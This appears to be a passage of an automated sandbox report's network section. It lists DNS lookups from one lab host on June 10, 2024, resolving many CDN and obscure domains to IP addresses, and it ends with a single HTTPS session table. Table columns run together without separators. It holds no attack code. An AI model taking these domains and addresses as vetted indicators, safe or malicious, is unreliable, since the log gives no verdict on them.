                                                                                                                                                          Jun 10, 2024 00:41:41.218866110 CEST1.1.1.1192.168.2.50x5504Name error (3)_1886._https.wssa-371.laorrey.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:41.635607004 CEST1.1.1.1192.168.2.50x5562No error (0)zb1-hw.qectyoua.comzb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:41.635607004 CEST1.1.1.1192.168.2.50x5562No error (0)zb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.079816103 CEST1.1.1.1192.168.2.50x4b3cNo error (0)ocsapi-lc.tingmeikj.comjh03-site-18.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.079816103 CEST1.1.1.1192.168.2.50x4b3cNo error (0)jh03-site-18.cdn-ng.net103.117.134.21A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.083472013 CEST1.1.1.1192.168.2.50x9fc3Name error (3)_1586._https.wssa-341.dalianjrkj.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.086468935 CEST1.1.1.1192.168.2.50x57f2No error (0)wssa-341.dalianjrkj.comwssa-341.dalianjrkj.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.086468935 CEST1.1.1.1192.168.2.50x57f2No error (0)wssa-341.dalianjrkj.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.152888060 CEST1.1.1.1192.168.2.50x685bNo error (0)zb-qq.gzjqwlkj.comzb-qq.gzjqwlkj.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.152888060 CEST1.1.1.1192.168.2.50x685bNo error (0)zb-qq.gzjqwlkj.com.cdn.dnsv1.com36s0iija.slt.sched.intlscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.263173103 CEST1.1.1.1192.168.2.50x9309No error (0)zb-hw.czwygs.comzb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.263173103 CEST1.1.1.1192.168.2.50x9309No error (0)zb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.263541937 CEST1.1.1.1192.168.2.50x380No error (0)zb-hw.czwygs.comzb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.263541937 CEST1.1.1.1192.168.2.50x380No error (0)zb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.263541937 CEST1.1.1.1192.168.2.50x380No error (0)hcdnw.ovc.sme.cdnhwccmz121.com223.121.15.24A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.263541937 CEST1.1.1.1192.168.2.50x380No error (0)hcdnw.ovc.sme.cdnhwccmz121.com23.90.149.106A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.263541937 CEST1.1.1.1192.168.2.50x380No error (0)hcdnw.ovc.sme.cdnhwccmz121.com90.84.161.22A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.282444954 CEST1.1.1.1192.168.2.50xead0No error (0)zb1-hw.qectyoua.comzb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.282444954 CEST1.1.1.1192.168.2.50xead0No error (0)zb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.282444954 CEST1.1.1.1192.168.2.50xead0No error (0)hcdnw.ovc.sme.cdnhwccmz121.com223.121.15.24A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.282444954 CEST1.1.1.1192.168.2.50xead0No error (0)hcdnw.ovc.sme.cdnhwccmz121.com23.90.149.106A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.282444954 CEST1.1.1.1192.168.2.50xead0No error (0)hcdnw.ovc.sme.cdnhwccmz121.com90.84.161.22A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.340390921 CEST1.1.1.1192.168.2.50x6b5aNo error (0)ahd-ocssn.qqxgo.coml7pmnx802xd4h452.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.340390921 CEST1.1.1.1192.168.2.50x6b5aNo error (0)l7pmnx802xd4h452.aliyunddos0015.com170.33.9.227A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.418154001 CEST1.1.1.1192.168.2.50x225aNo error (0)ocsapi-lc.tingmeikj.comjh03-site-18.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.439253092 CEST1.1.1.1192.168.2.50x8ac2No error (0)ahd-ocssn.qqxgo.coml7pmnx802xd4h452.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)zb-qq.gzjqwlkj.comzb-qq.gzjqwlkj.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)zb-qq.gzjqwlkj.com.cdn.dnsv1.com36s0iija.slt.sched.intlscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com211.152.148.109A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com54.150.37.130A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com122.10.255.44A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com43.132.64.28A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com43.201.120.160A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com52.76.116.62A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com211.152.148.88A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com43.152.14.32A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com15.188.236.70A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com43.152.23.34A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com129.227.190.50A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com101.33.24.11A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com43.152.25.102A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com52.220.25.48A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:42.480865955 CEST1.1.1.1192.168.2.50x1b8aNo error (0)36s0iija.slt.sched.intlscdn.com101.33.17.55A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:43.543626070 CEST1.1.1.1192.168.2.50x3acaNo error (0)static.meiqia.comstatic.meiqia.com.wswebpic.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:43.723041058 CEST1.1.1.1192.168.2.50xf485No error (0)static.meiqia.comstatic.meiqia.com.wswebpic.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:43.723041058 CEST1.1.1.1192.168.2.50xf485No error (0)static.meiqia.com.wswebpic.com163.171.128.148A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:43.723041058 CEST1.1.1.1192.168.2.50xf485No error (0)static.meiqia.com.wswebpic.com163.171.133.124A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.099059105 CEST1.1.1.1192.168.2.50x2677No error (0)e933002.com38.174.148.235A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.099059105 CEST1.1.1.1192.168.2.50x2677No error (0)e933002.com38.174.148.234A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.305339098 CEST1.1.1.1192.168.2.50x4485No error (0)static.meiqia.comstatic.meiqia.com.wswebpic.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.309499025 CEST1.1.1.1192.168.2.50xbba8No error (0)static.meiqia.comstatic.meiqia.com.wswebpic.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.309499025 CEST1.1.1.1192.168.2.50xbba8No error (0)static.meiqia.com.wswebpic.com163.171.133.124A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.309499025 CEST1.1.1.1192.168.2.50xbba8No error (0)static.meiqia.com.wswebpic.com163.171.128.148A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.867280006 CEST1.1.1.1192.168.2.50x27ccNo error (0)stt-wasm.ai4funs.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.867280006 CEST1.1.1.1192.168.2.50x27ccNo error (0)stt-wasm.ai4funs.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.891872883 CEST1.1.1.1192.168.2.50xebbeNo error (0)stt-wasm.ai4funs.com65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.905268908 CEST1.1.1.1192.168.2.50x8f3aName error (3)_8066._https.appiso-ty.zvbzjsb.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.934591055 CEST1.1.1.1192.168.2.50x5766No error (0)ocsapi-aws.huayidm.comd1o41tonhrxnzj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.934591055 CEST1.1.1.1192.168.2.50x5766No error (0)d1o41tonhrxnzj.cloudfront.net13.32.99.27A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.934591055 CEST1.1.1.1192.168.2.50x5766No error (0)d1o41tonhrxnzj.cloudfront.net13.32.99.120A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.934591055 CEST1.1.1.1192.168.2.50x5766No error (0)d1o41tonhrxnzj.cloudfront.net13.32.99.39A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.934591055 CEST1.1.1.1192.168.2.50x5766No error (0)d1o41tonhrxnzj.cloudfront.net13.32.99.115A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:44.942167997 CEST1.1.1.1192.168.2.50xd164No error (0)ocsapi-aws.huayidm.comd1o41tonhrxnzj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.070060015 CEST1.1.1.1192.168.2.50x9fdbName error (3)_1066._https.appiso-ty.souzhanzx.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.115653992 CEST1.1.1.1192.168.2.50xad75No error (0)ahd-ocssn.qqxgo.coml7pmnx802xd4h452.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.294969082 CEST1.1.1.1192.168.2.50xf97eNo error (0)ahd-ocssn.qqxgo.coml7pmnx802xd4h452.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.294969082 CEST1.1.1.1192.168.2.50xf97eNo error (0)l7pmnx802xd4h452.aliyunddos0015.com170.33.9.227A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.390172005 CEST1.1.1.1192.168.2.50x5040No error (0)static.meiqia.comstatic.meiqia.com.wswebpic.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.399079084 CEST1.1.1.1192.168.2.50x81e1No error (0)cstaticdun.126.netcstaticdun.126.net.163jiasu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.399079084 CEST1.1.1.1192.168.2.50x81e1No error (0)cstaticdun.126.net.163jiasu.comcstaticdun.126.net.w.kunluncan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.399079084 CEST1.1.1.1192.168.2.50x81e1No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.399079084 CEST1.1.1.1192.168.2.50x81e1No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.246A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.399079084 CEST1.1.1.1192.168.2.50x81e1No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.249A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.399079084 CEST1.1.1.1192.168.2.50x81e1No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.243A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.399079084 CEST1.1.1.1192.168.2.50x81e1No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.250A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.399079084 CEST1.1.1.1192.168.2.50x81e1No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.399079084 CEST1.1.1.1192.168.2.50x81e1No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.245A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.399079084 CEST1.1.1.1192.168.2.50x81e1No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.445704937 CEST1.1.1.1192.168.2.50x4241Name error (3)_1586._https.wssa-341.dalianjrkj.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.524532080 CEST1.1.1.1192.168.2.50xb44dNo error (0)appiso-ty.souzhanzx.comjh03-site-15.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.524532080 CEST1.1.1.1192.168.2.50xb44dNo error (0)jh03-site-15.cdn-ng.net103.188.120.129A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.524532080 CEST1.1.1.1192.168.2.50xb44dNo error (0)jh03-site-15.cdn-ng.net103.24.53.62A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.529953003 CEST1.1.1.1192.168.2.50x5c19No error (0)appiso-ty.zvbzjsb.comjh03-site-15.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.529953003 CEST1.1.1.1192.168.2.50x5c19No error (0)jh03-site-15.cdn-ng.net103.188.120.129A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.529953003 CEST1.1.1.1192.168.2.50x5c19No error (0)jh03-site-15.cdn-ng.net103.24.53.62A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.626718998 CEST1.1.1.1192.168.2.50x97f2No error (0)static.meiqia.comstatic.meiqia.com.wswebpic.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.626718998 CEST1.1.1.1192.168.2.50x97f2No error (0)static.meiqia.com.wswebpic.com163.171.133.124A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.626718998 CEST1.1.1.1192.168.2.50x97f2No error (0)static.meiqia.com.wswebpic.com163.171.128.148A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.631896019 CEST1.1.1.1192.168.2.50x8496No error (0)wssa-341.dalianjrkj.comwssa-341.dalianjrkj.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.631896019 CEST1.1.1.1192.168.2.50x8496No error (0)wssa-341.dalianjrkj.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.678399086 CEST1.1.1.1192.168.2.50x1d13Name error (3)_1986._https.wssa-381.moceand.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.702980042 CEST1.1.1.1192.168.2.50x89ecNo error (0)wssa-381.moceand.comwssa-381.moceand.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.702980042 CEST1.1.1.1192.168.2.50x89ecNo error (0)wssa-381.moceand.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.804896116 CEST1.1.1.1192.168.2.50x451cNo error (0)wssa-381.moceand.comwssa-381.moceand.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.804896116 CEST1.1.1.1192.168.2.50x451cNo error (0)wssa-381.moceand.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.828773022 CEST1.1.1.1192.168.2.50x8ff4Name error (3)_1986._https.wssa-381.moceand.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.832530975 CEST1.1.1.1192.168.2.50xae05No error (0)cstaticdun.126.netcstaticdun.126.net.163jiasu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.832530975 CEST1.1.1.1192.168.2.50xae05No error (0)cstaticdun.126.net.163jiasu.comcstaticdun.126.net.w.kunluncan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.835931063 CEST1.1.1.1192.168.2.50x51e5No error (0)ocsapi-lc.tingmeikj.comjh03-site-18.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.835931063 CEST1.1.1.1192.168.2.50x51e5No error (0)jh03-site-18.cdn-ng.net103.117.134.21A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.839452982 CEST1.1.1.1192.168.2.50xc12eNo error (0)edge-api.meiqia.comedge-api.meiqia.com.acc.edgeonedy1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.839452982 CEST1.1.1.1192.168.2.50xc12eNo error (0)edge-api.meiqia.com.acc.edgeonedy1.com43.175.135.229A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.840810061 CEST1.1.1.1192.168.2.50x23b5No error (0)edge-api.meiqia.comedge-api.meiqia.com.acc.edgeonedy1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.891099930 CEST1.1.1.1192.168.2.50x2fa2No error (0)cstaticdun.126.netcstaticdun.126.net.163jiasu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.891099930 CEST1.1.1.1192.168.2.50x2fa2No error (0)cstaticdun.126.net.163jiasu.comcstaticdun.126.net.w.kunluncan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.891099930 CEST1.1.1.1192.168.2.50x2fa2No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.249A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.891099930 CEST1.1.1.1192.168.2.50x2fa2No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.245A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.891099930 CEST1.1.1.1192.168.2.50x2fa2No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.891099930 CEST1.1.1.1192.168.2.50x2fa2No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.250A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.891099930 CEST1.1.1.1192.168.2.50x2fa2No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.246A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.891099930 CEST1.1.1.1192.168.2.50x2fa2No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.891099930 CEST1.1.1.1192.168.2.50x2fa2No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:45.891099930 CEST1.1.1.1192.168.2.50x2fa2No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.243A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.051367044 CEST1.1.1.1192.168.2.50xf0fcNo error (0)edge-api.meiqia.comedge-api.meiqia.com.acc.edgeonedy1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.055474997 CEST1.1.1.1192.168.2.50x10c3No error (0)edge-api.meiqia.comedge-api.meiqia.com.acc.edgeonedy1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.055474997 CEST1.1.1.1192.168.2.50x10c3No error (0)edge-api.meiqia.com.acc.edgeonedy1.com43.175.135.229A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.149646044 CEST1.1.1.1192.168.2.50xe957No error (0)cstaticdun.126.netcstaticdun.126.net.163jiasu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.149646044 CEST1.1.1.1192.168.2.50xe957No error (0)cstaticdun.126.net.163jiasu.comcstaticdun.126.net.w.kunluncan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.312223911 CEST1.1.1.1192.168.2.50xdb37No error (0)cstaticdun.126.netcstaticdun.126.net.163jiasu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.312223911 CEST1.1.1.1192.168.2.50xdb37No error (0)cstaticdun.126.net.163jiasu.comcstaticdun.126.net.w.kunluncan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.312223911 CEST1.1.1.1192.168.2.50xdb37No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.249A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.312223911 CEST1.1.1.1192.168.2.50xdb37No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.312223911 CEST1.1.1.1192.168.2.50xdb37No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.245A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.312223911 CEST1.1.1.1192.168.2.50xdb37No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.243A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.312223911 CEST1.1.1.1192.168.2.50xdb37No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.312223911 CEST1.1.1.1192.168.2.50xdb37No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.246A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.312223911 CEST1.1.1.1192.168.2.50xdb37No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.312223911 CEST1.1.1.1192.168.2.50xdb37No error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.250A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.495781898 CEST1.1.1.1192.168.2.50xc4a2No error (0)cstaticdun.126.netcstaticdun.126.net.163jiasu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.495781898 CEST1.1.1.1192.168.2.50xc4a2No error (0)cstaticdun.126.net.163jiasu.comcstaticdun.126.net.w.kunluncan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:46.550628901 CEST1.1.1.1192.168.2.50xa203No error (0)ocsapi-lc.tingmeikj.comjh03-site-18.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.885325909 CEST1.1.1.1192.168.2.50x9f2bNo error (0)cstaticdun.126.netcstaticdun.126.net.163jiasu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.885325909 CEST1.1.1.1192.168.2.50x9f2bNo error (0)cstaticdun.126.net.163jiasu.comcstaticdun.126.net.w.kunluncan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.885325909 CEST1.1.1.1192.168.2.50x9f2bNo error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.245A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.885325909 CEST1.1.1.1192.168.2.50x9f2bNo error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.885325909 CEST1.1.1.1192.168.2.50x9f2bNo error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.246A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.885325909 CEST1.1.1.1192.168.2.50x9f2bNo error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.243A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.885325909 CEST1.1.1.1192.168.2.50x9f2bNo error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.885325909 CEST1.1.1.1192.168.2.50x9f2bNo error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.250A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.885325909 CEST1.1.1.1192.168.2.50x9f2bNo error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.249A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:49.885325909 CEST1.1.1.1192.168.2.50x9f2bNo error (0)cstaticdun.126.net.w.kunluncan.com163.181.92.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:50.393120050 CEST1.1.1.1192.168.2.50x7876No error (0)cstaticdun.126.netcstaticdun.126.net.163jiasu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:41:50.393120050 CEST1.1.1.1192.168.2.50x7876No error (0)cstaticdun.126.net.163jiasu.comcstaticdun.126.net.w.kunluncan.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                          0192.168.2.54970434.117.186.192443
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:11 UTC59OUTGET / HTTP/1.1
